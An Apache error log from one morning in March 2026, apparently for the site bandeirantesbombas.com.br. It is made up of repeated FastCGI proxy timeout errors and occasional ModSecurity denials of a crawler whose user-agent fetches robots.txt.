[Sun Mar 15 08:00:03.336571 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:00:25.129038 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37246] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:00:46.117874 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37482] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:01:07.126514 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37664] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:01:28.129797 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37868] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:01:48.930954 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.228.16:55972] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaRnNSswJuvopo3lOjCHgAAAIw"]
[Sun Mar 15 08:01:49.113141 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38094] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:02:10.125808 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38268] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:02:31.133790 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38514] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:02:52.132575 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38834] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:03:13.129760 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39096] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:03:34.033909 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39372] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:03:55.123088 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39662] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:04:20.129815 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39926] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:04:42.125807 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40224] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:05:04.193896 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40458] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:05:25.059018 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40762] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:05:33.205800 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.244.31:36286] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaSfXjZBu2q05ozVU-yLQAAAVc"]
[Sun Mar 15 08:05:46.130495 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:06:07.125843 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:06:28.060767 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41582] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:06:49.065929 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41854] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:06:57.565396 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.228.16:44122] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaS0XbQATo66fKoS7yibAAAAMI"]
[Sun Mar 15 08:07:10.091919 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42086] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:07:34.153843 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:07:55.117862 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42658] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:08:16.121266 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42936] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:08:38.093863 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43188] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:08:59.057850 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:09:20.273801 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:09:42.121952 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43834] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:10:03.133821 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43992] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:10:24.160319 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:10:41.204577 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.244.31:38048] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaTsdSswJuvopo3lOjDWAAAAIc"]
[Sun Mar 15 08:10:45.121671 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44476] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:11:10.125818 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:11:31.129869 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:11:52.057820 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45210] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:12:13.125821 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45488] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:12:21.859693 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.228.16:60024] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaUFbABkC4fWIHEf8FJUgAAAFE"]
[Sun Mar 15 08:12:34.133814 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45706] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:12:55.129927 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45946] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:13:16.145804 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:13:37.125805 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46438] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:13:59.390110 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46730] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:14:21.125821 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47116] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:14:42.134006 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47410] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:15:04.125929 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:15:25.129808 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47952] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:15:46.141776 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48196] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:16:05.304650 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.244.31:47342] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaU9XjZBu2q05ozVU-zowAAAUY"]
[Sun Mar 15 08:16:08.125822 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:16:29.057830 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:16:50.131671 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48946] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:17:11.129813 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:17:32.121793 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49410] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:17:33.052056 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.228.16:35836] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaVTXjZBu2q05ozVU-z4gAAAUI"]
[Sun Mar 15 08:17:53.133877 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:18:14.121224 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49990] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:18:35.137830 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:18:56.041806 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:50624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:19:17.073861 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50900] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:19:38.053791 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51126] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:19:59.129800 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:20:21.069878 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51586] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:20:42.134573 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:21:03.117780 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:21:11.663314 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.244.31:47390] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaWJ5qj1wV0Si-Okec5KwAAABU"]
[Sun Mar 15 08:21:24.125809 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52484] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:21:45.036179 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:22:06.029806 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52942] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:22:28.121788 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53184] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:22:49.129821 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:22:56.010840 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.228.16:51126] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaWkHjZBu2q05ozVU-0tAAAAVU"]
[Sun Mar 15 08:23:10.057903 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53678] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:23:31.122637 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53966] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:23:52.081829 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:24:13.121797 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:24:34.125850 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:24:55.075111 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:25:17.141829 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55486] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:25:39.144775 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:26:01.133832 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56050] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:26:22.057990 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56342] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:26:27.807633 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.244.31:39034] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaXY5qj1wV0Si-Okec6CgAAABU"]
[Sun Mar 15 08:26:43.137843 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:27:06.122214 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56900] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:27:27.121843 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57204] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:27:48.130059 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:28:06.866756 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.228.16:56106] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaXxnbQATo66fKoS7ylgQAAAM4"]
[Sun Mar 15 08:28:09.121863 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57832] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:28:30.125820 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:28:51.125806 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58334] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:29:12.088535 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58586] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:29:34.129777 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58816] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:29:55.133787 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:30:16.125796 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59336] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:30:37.125813 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59576] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:30:59.033930 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59822] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:31:20.134665 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60024] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:31:34.142660 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.244.31:60102] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaYlnjZBu2q05ozVU-1-gAAAUY"]
[Sun Mar 15 08:31:42.133828 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60392] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:32:03.493822 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60674] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:32:25.130873 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60920] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:32:47.037925 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:32930] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:33:08.123481 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:33:23.450478 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.228.16:46770] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaZA3jZBu2q05ozVU-2OQAAAUA"]
[Sun Mar 15 08:33:30.085868 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33346] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:33:51.129864 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33632] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:34:12.125781 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33886] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:34:33.041838 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34120] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:34:54.125827 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34448] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:35:16.079241 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34754] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:35:37.085812 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35032] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:35:58.125846 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35304] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:36:20.125827 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35592] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:36:41.129837 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35912] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:37:02.121337 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36340] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:37:02.146569 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.244.31:41084] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaZ3rABkC4fWIHEf8FM4QAAAEY"]
[Sun Mar 15 08:37:23.069842 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36634] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:37:44.123788 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36876] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:38:05.041831 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37104] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:38:26.137783 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37336] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:38:30.678525 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.228.16:34910] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaaNtSswJuvopo3lOjHUQAAAII"]
[Sun Mar 15 08:38:52.127358 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37664] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:39:18.125778 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37978] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:39:39.127254 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:40:00.152892 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 08:40:22.125878 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38702] AH01075: Error dispatching request to : (polling)
